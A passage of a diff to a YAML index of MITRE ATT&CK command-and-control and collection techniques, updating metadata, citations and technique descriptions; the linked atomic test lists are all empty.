         it receives from a server). User behavior monitoring may help to detect abnormal
         patterns of activity.(Citation: University of Birmingham C2)'
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Flow'
       - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Connection Creation'
-      x_mitre_permissions_required:
-      - User
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--830c9528-df21-472c-8c14-a036bf17d665
+      created: '2017-05-31T21:31:13.915Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1102
+        external_id: T1102
+      - source_name: Broadcom BirdyClient Microsoft Graph API 2024
+        description: Broadcom. (2024, May 2). BirdyClient malware leverages Microsoft
+          Graph API for C&C communication. Retrieved July 1, 2024.
+        url: https://www.broadcom.com/support/security-center/protection-bulletin/birdyclient-malware-leverages-microsoft-graph-api-for-c-c-communication
+      - source_name: University of Birmingham C2
+        description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
+          & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
+        url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1568.003:
     technique:
@@ -37955,7 +38424,7 @@ command-and-control:
         description: Rapid7. (2013, August 26). Upcoming G20 Summit Fuels Espionage
           Operations. Retrieved March 6, 2017.
         url: https://blog.rapid7.com/2013/08/26/upcoming-g20-summit-fuels-espionage-operations/
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-27T20:54:28.287Z'
       name: DNS Calculation
       description: |-
         Adversaries may perform calculations on addresses returned in DNS results to determine which port and IP address to use for command and control, rather than relying on a predetermined port number or the actual returned IP address. A IP and/or port number calculation can be used to bypass egress filtering on a C2 channel.(Citation: Meyers Numbered Panda)
@@ -37972,8 +38441,6 @@ command-and-control:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1104:
     technique:
@@ -37993,7 +38460,7 @@ command-and-control:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1104
         external_id: T1104
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-07-14T19:43:38.181Z'
       name: Multi-Stage Channels
       description: |-
         Adversaries may create multiple stages for command and control that are employed under different conditions or for certain functions. Use of multiple stages may obfuscate the command and control channel to make detection more difficult.
@@ -38016,8 +38483,6 @@ command-and-control:
       - 'Network Traffic: Network Traffic Flow'
       - 'Network Traffic: Network Connection Creation'
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1205.001:
     technique:
@@ -38042,7 +38507,7 @@ command-and-control:
         description: 'Hartrell, Greg. (2002, August). Get a handle on cd00r: The invisible
           backdoor. Retrieved October 13, 2018.'
         source_name: Hartrell cd00r 2002
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-11T18:31:23.996Z'
       name: Port Knocking
       description: |-
         Adversaries may use port knocking to hide open ports used for persistence or command and control. To enable a port, an adversary sends a series of attempted connections to a predefined sequence of closed ports. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software.
@@ -38067,8 +38532,6 @@ command-and-control:
       - 'Network Traffic: Network Traffic Flow'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1071.002:
     technique:
@@ -38133,7 +38596,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1102.003:
     technique:
@@ -38157,7 +38619,7 @@ command-and-control:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-26T23:26:10.109Z'
       name: One-Way Communication
       description: |-
         Adversaries may use an existing, legitimate external Web service as a means for sending commands to a compromised system without receiving return output over the Web service channel. Compromised systems may leverage popular websites and social media to host command and control (C2) instructions. Those infected systems may opt to send the output from those commands back over a different C2 channel, including to another distinct Web service. Alternatively, compromised systems may return no output at all in cases where adversaries want to send instructions to systems and do not want a response.
@@ -38182,21 +38644,36 @@ command-and-control:
       - 'Network Traffic: Network Traffic Content'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1090.003:
     technique:
-      modified: '2024-04-19T13:24:36.872Z'
+      modified: '2024-09-25T20:48:24.411Z'
       name: 'Proxy: Multi-hop Proxy'
-      description: |-
-        Adversaries may chain together multiple proxies to disguise the source of malicious traffic. Typically, a defender will be able to identify the last proxy traffic traversed before it enters their network; the defender may or may not be able to identify any previous proxies before the last-hop proxy. This technique makes identifying the original source of the malicious traffic even more difficult by requiring the defender to trace malicious traffic through several proxies to identify its source.
-
-        For example, adversaries may construct or use onion routing networks – such as the publicly available [Tor](https://attack.mitre.org/software/S0183) network – to transport encrypted C2 traffic through a compromised population, allowing communication with any device within the network.(Citation: Onion Routing)
-
-        In the case of network infrastructure, it is possible for an adversary to leverage multiple compromised devices to create a multi-hop proxy chain (i.e., [Network Devices](https://attack.mitre.org/techniques/T1584/008)). By leveraging [Patch System Image](https://attack.mitre.org/techniques/T1601/001) on routers, adversaries can add custom code to the affected network devices that will implement onion routing between those nodes. This method is dependent upon the [Network Boundary Bridging](https://attack.mitre.org/techniques/T1599) method allowing the adversaries to cross the protected network boundary of the Internet perimeter and into the organization’s Wide-Area Network (WAN).  Protocols such as ICMP may be used as a transport.
-
-        Similarly, adversaries may abuse peer-to-peer (P2P) and blockchain-oriented infrastructure to implement routing between a decentralized network of peers.(Citation: NGLite Trojan)
+      description: "Adversaries may chain together multiple proxies to disguise the
+        source of malicious traffic. Typically, a defender will be able to identify
+        the last proxy traffic traversed before it enters their network; the defender
+        may or may not be able to identify any previous proxies before the last-hop
+        proxy. This technique makes identifying the original source of the malicious
+        traffic even more difficult by requiring the defender to trace malicious traffic
+        through several proxies to identify its source.\n\nFor example, adversaries
+        may construct or use onion routing networks – such as the publicly available
+        [Tor](https://attack.mitre.org/software/S0183) network – to transport encrypted
+        C2 traffic through a compromised population, allowing communication with any
+        device within the network.(Citation: Onion Routing) Adversaries may also use
+        operational relay box (ORB) networks composed of virtual private servers (VPS),
+        Internet of Things (IoT) devices, smart devices, and end-of-life routers to
+        obfuscate their operations. (Citation: ORB Mandiant) \n\nIn the case of network
+        infrastructure, it is possible for an adversary to leverage multiple compromised
+        devices to create a multi-hop proxy chain (i.e., [Network Devices](https://attack.mitre.org/techniques/T1584/008)).
+        By leveraging [Patch System Image](https://attack.mitre.org/techniques/T1601/001)
+        on routers, adversaries can add custom code to the affected network devices
+        that will implement onion routing between those nodes. This method is dependent
+        upon the [Network Boundary Bridging](https://attack.mitre.org/techniques/T1599)
+        method allowing the adversaries to cross the protected network boundary of
+        the Internet perimeter and into the organization’s Wide-Area Network (WAN).
+        \ Protocols such as ICMP may be used as a transport.  \n\nSimilarly, adversaries
+        may abuse peer-to-peer (P2P) and blockchain-oriented infrastructure to implement
+        routing between a decentralized network of peers.(Citation: NGLite Trojan)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: command-and-control
@@ -38215,7 +38692,7 @@ command-and-control:
       - macOS
       - Windows
       - Network
-      x_mitre_version: '2.1'
+      x_mitre_version: '2.2'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Flow'
       - 'Network Traffic: Network Traffic Content'
@@ -38229,6 +38706,11 @@ command-and-control:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1090/003
         external_id: T1090.003
+      - source_name: ORB Mandiant
+        description: Raggi, Michael. (2024, May 22). IOC Extinction? China-Nexus Cyber
+          Espionage Actors Use ORB Networks to Raise Cost on Defenders. Retrieved
+          July 8, 2024.
+        url: https://cloud.google.com/blog/topics/threat-intelligence/china-nexus-espionage-orb-networks
       - source_name: NGLite Trojan
         description: Robert Falcone, Jeff White, and Peter Renals. (2021, November
           7). Targeted Attack Campaign Against ManageEngine ADSelfService Plus Delivers
@@ -38242,12 +38724,11 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1090.003
     atomic_tests: []
   T1001:
     technique:
-      modified: '2024-02-02T19:04:35.389Z'
+      modified: '2024-10-07T15:07:47.232Z'
       name: Data Obfuscation
       description: 'Adversaries may obfuscate command and control traffic to make
         it more difficult to detect.(Citation: Bitdefender FunnyDream Campaign November
@@ -38297,11 +38778,10 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1571:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-09-12T19:37:57.868Z'
       name: Non-Standard Port
       description: |-
         Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088(Citation: Symantec Elfin Mar 2019) or port 587(Citation: Fortinet Agent Tesla April 2018) as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
@@ -38310,20 +38790,20 @@ command-and-control:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: command-and-control
+      x_mitre_deprecated: false
       x_mitre_detection: 'Analyze packet contents to detect communications that do
         not follow the expected protocol behavior for the port that is being used.
         Analyze network data for uncommon data flows (e.g., a client sending significantly
         more data than it receives from a server). Processes utilizing the network
         that do not normally have network communication or have never been seen before
         are suspicious.(Citation: University of Birmingham C2)'
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Linux
       - macOS
       - Windows
-      x_mitre_is_subtechnique: false
-      x_mitre_deprecated: false
-      x_mitre_domains:
-      - enterprise-attack
       x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Flow'
@@ -38348,17 +38828,16 @@ command-and-control:
         url: https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage
       - source_name: change_rdp_port_conti
         description: 'The DFIR Report. (2022, March 1). "Change RDP port" #ContiLeaks.
-          Retrieved March 1, 2022.'
-        url: https://twitter.com/TheDFIRReport/status/1498657772254240768
+          Retrieved September 12, 2024.'
+        url: https://x.com/TheDFIRReport/status/1498657772254240768
       - source_name: Fortinet Agent Tesla April 2018
         description: Zhang, X. (2018, April 05). Analysis of New Agent Tesla Spyware
           Variant. Retrieved November 5, 2018.
         url: https://www.fortinet.com/blog/threat-research/analysis-of-new-agent-tesla-spyware-variant.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1571
     atomic_tests: []
   T1573:
@@ -38414,7 +38893,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1573
     atomic_tests: []
   T1102.002:
@@ -38439,7 +38917,7 @@ command-and-control:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-26T23:15:47.861Z'
       name: Bidirectional Communication
       description: "Adversaries may use an existing, legitimate external Web service
         as a means for sending commands to and receiving output from a compromised
@@ -38476,8 +38954,6 @@ command-and-control:
       - 'Network Traffic: Network Traffic Flow'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1573.002:
     technique:
@@ -38531,7 +39007,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1095:
     technique:
@@ -38603,33 +39078,12 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1095
     atomic_tests: []
   T1001.003:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - Windows
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--c325b232-d5bc-4dde-a3ec-71f3db9e8adc
-      type: attack-pattern
-      created: '2020-03-15T00:40:27.503Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1001.003
-        url: https://attack.mitre.org/techniques/T1001/003
-      - url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
-        description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
-          & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
-        source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
-      name: Protocol Impersonation
+      modified: '2024-10-09T15:40:19.436Z'
+      name: Protocol or Service Impersonation
       description: "Adversaries may impersonate legitimate protocols or web service
         traffic to disguise command and control activity and thwart analysis efforts.
         By impersonating legitimate protocols or web services, adversaries can make
@@ -38637,23 +39091,61 @@ command-and-control:
         \ \n\nAdversaries may impersonate a fake SSL/TLS handshake to make it look
         like subsequent traffic is SSL/TLS encrypted, potentially interfering with
         some security tooling, or to make the traffic look like it is related with
-        a trusted entity. "
+        a trusted entity. \n\nAdversaries may also leverage legitimate protocols to
+        impersonate expected web traffic or trusted services. For example, adversaries
+        may manipulate HTTP headers, URI endpoints, SSL certificates, and transmitted
+        data to disguise C2 communications or mimic legitimate services such as Gmail,
+        Google Drive, and Yahoo Messenger.(Citation: ESET Okrum July 2019)(Citation:
+        Malleable-C2-U42)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: command-and-control
+      x_mitre_contributors:
+      - James Emery-Callcott, Emerging Threats Team, Proofpoint
+      x_mitre_deprecated: false
       x_mitre_detection: 'Analyze network data for uncommon data flows (e.g., a client
         sending significantly more data than it receives from a server). Processes
         utilizing the network that do not normally have network communication or have
         never been seen before are suspicious. Analyze packet contents to detect communications
         that do not follow the expected protocol behavior for the port that is being
         used.(Citation: University of Birmingham C2)'
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - Windows
+      - macOS
+      x_mitre_version: '2.0'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--c325b232-d5bc-4dde-a3ec-71f3db9e8adc
+      created: '2020-03-15T00:40:27.503Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1001/003
+        external_id: T1001.003
+      - source_name: Malleable-C2-U42
+        description: 'Chris Navarrete Durgesh Sangvikar Andrew Guan Yu Fu Yanhui Jia
+          Siddhart Shibiraj. (2022, March 16). Cobalt Strike Analysis and Tutorial:
+          How Malleable C2 Profiles Make Cobalt Strike Difficult to Detect. Retrieved
+          September 24, 2024.'
+        url: https://unit42.paloaltonetworks.com/cobalt-strike-malleable-c2-profile/
+      - source_name: University of Birmingham C2
+        description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
+          & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
+        url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
+      - source_name: ESET Okrum July 2019
+        description: 'Hromcova, Z. (2019, July). OKRUM AND KETRICAN: AN OVERVIEW OF
+          RECENT KE3CHANG GROUP ACTIVITY. Retrieved May 6, 2020.'
+        url: https://www.welivesecurity.com/wp-content/uploads/2019/07/ESET_Okrum_and_Ketrican.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1090.004:
     technique:
@@ -38700,7 +39192,6 @@ command-and-control:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
     atomic_tests: []
   T1132:
     technique:
@@ -38760,7 +39251,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1132.002:
     technique:
@@ -38792,7 +39282,7 @@ command-and-control:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-14T23:39:50.117Z'
       name: Non-Standard Encoding
       description: 'Adversaries may encode data with a non-standard data encoding
         system to make the content of command and control traffic more difficult to
@@ -38818,8 +39308,6 @@ command-and-control:
       - 'Network Traffic: Network Traffic Content'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1071.001:
     technique:
@@ -38886,7 +39374,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1071.001
     atomic_tests: []
   T1105:
@@ -38984,7 +39471,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1105
     atomic_tests: []
   T1665:
@@ -39077,7 +39563,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1001.002:
     technique:
@@ -39101,7 +39586,7 @@ command-and-control:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-15T00:37:58.963Z'
       name: Data Obfuscation via Steganography
       description: 'Adversaries may use steganographic techniques to hide command
         and control traffic to make detection efforts more difficult. Steganographic
@@ -39124,8 +39609,6 @@ command-and-control:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1001.002
     atomic_tests: []
   T1008:
@@ -39150,7 +39633,7 @@ command-and-control:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-07-14T19:49:47.340Z'
       name: Fallback Channels
       description: Adversaries may use fallback or alternate communication channels
         if the primary channel is compromised or inaccessible in order to maintain
@@ -39170,8 +39653,6 @@ command-and-control:
       - 'Network Traffic: Network Traffic Flow'
       - 'Network Traffic: Network Connection Creation'
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1090.001:
     technique:
@@ -39225,7 +39706,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1090.001
     atomic_tests: []
   T1102.001:
@@ -39250,7 +39730,7 @@ command-and-control:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-26T23:12:30.499Z'
       name: Dead Drop Resolver
       description: |-
         Adversaries may use an existing, legitimate external Web service to host information that points to additional command and control (C2) infrastructure. Adversaries may post content, known as a dead drop resolver, on Web services with embedded (and often obfuscated/encoded) domains or IP addresses. Once infected, victims will reach out to and be redirected by these resolvers.
@@ -39276,8 +39756,6 @@ command-and-control:
       - 'Network Traffic: Network Traffic Flow'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1001.001:
     technique:
@@ -39331,7 +39809,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
 collection:
   T1560.001:
@@ -39407,7 +39884,6 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1560.001
     atomic_tests: []
   T1113:
@@ -39464,7 +39940,6 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
       identifier: T1113
     atomic_tests: []
   T1557:
@@ -39558,7 +40033,6 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1056.001:
     technique:
@@ -39637,7 +40111,6 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1056.001
     atomic_tests: []
   T1602:
@@ -39676,7 +40149,7 @@ collection:
         Adversaries may collect data related to managed devices from configuration repositories. Configuration repositories are used by management systems in order to configure, manage, and control data on remote systems. Configuration repositories may also facilitate remote access and administration of devices.
 
         Adversaries may target these repositories in order to collect large quantities of sensitive system administration data. Data from configuration repositories may be exposed by various protocols and software and can store a wide variety of data, much of which may align with adversary Discovery objectives.(Citation: US-CERT-TA18-106A)(Citation: US-CERT TA17-156A SNMP Abuse 2017)
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-19T21:32:58.274Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Data from Configuration Repository
       x_mitre_detection: 'Identify network traffic sent or received by untrusted hosts
@@ -39691,30 +40164,10 @@ collection:
       - 'Network Traffic: Network Connection Creation'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1213.002:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Office 365
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--0c4b4fda-9062-47da-98b9-ceae2dcf052a
-      type: attack-pattern
-      created: '2020-02-14T13:35:32.938Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1213.002
-        url: https://attack.mitre.org/techniques/T1213/002
-      - url: https://support.office.com/en-us/article/configure-audit-settings-for-a-site-collection-a9920c97-38c0-44f2-8bcb-4cf1e2ae22d2
-        description: Microsoft. (2017, July 19). Configure audit settings for a site
-          collection. Retrieved April 4, 2018.
-        source_name: Microsoft SharePoint Logging
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Sharepoint
       description: |
         Adversaries may leverage the SharePoint repository as a source to mine valuable information. SharePoint will often contain useful information for an adversary to learn about the structure and functionality of the internal network and systems. For example, the following is a list of example information that may hold potential value to an adversary and may also be found on SharePoint:
@@ -39723,13 +40176,17 @@ collection:
         * Physical / logical network diagrams
         * System architecture diagrams
         * Technical system documentation
-        * Testing / development credentials
+        * Testing / development credentials (i.e., [Unsecured Credentials](https://attack.mitre.org/techniques/T1552))
         * Work / project schedules
         * Source code snippets
         * Links to network shares and other internal resources
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: collection
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_contributors:
+      - Arun Seelagan, CISA
+      x_mitre_deprecated: false
       x_mitre_detection: "The user access logging within Microsoft's SharePoint can
         be configured to report access to certain pages and documents. (Citation:
         Microsoft SharePoint Logging). As information repositories generally have
@@ -39743,20 +40200,37 @@ collection:
         of programmatic means being used to retrieve all data within the repository.
         In environments with high-maturity, it may be possible to leverage User-Behavioral
         Analytics (UBA) platforms to detect and alert on user based anomalies. \n\n"
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - Office Suite
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Application Log: Application Log Content'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      - 'Cloud Service: Cloud Service Metadata'
+      type: attack-pattern
+      id: attack-pattern--0c4b4fda-9062-47da-98b9-ceae2dcf052a
+      created: '2020-02-14T13:35:32.938Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1213/002
+        external_id: T1213.002
+      - source_name: Microsoft SharePoint Logging
+        description: Microsoft. (2017, July 19). Configure audit settings for a site
+          collection. Retrieved April 4, 2018.
+        url: https://support.office.com/en-us/article/configure-audit-settings-for-a-site-collection-a9920c97-38c0-44f2-8bcb-4cf1e2ae22d2
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
     atomic_tests: []
   T1123:
     technique:
-      modified: '2024-01-23T22:53:18.389Z'
+      modified: '2024-10-15T13:39:22.774Z'
       name: Audio Capture
       description: |-
         An adversary can leverage a computer's peripheral devices (e.g., microphones and webcams) or applications (e.g., voice and video call services) to capture audio recordings for the purpose of listening into sensitive conversations to gather information.(Citation: ESET Attor Oct 2019)
@@ -39799,7 +40273,6 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1123
     atomic_tests: []
   T1560.003:
@@ -39824,7 +40297,7 @@ collection:
         description: 'ESET. (2016, October). En Route with Sednit - Part 2: Observing
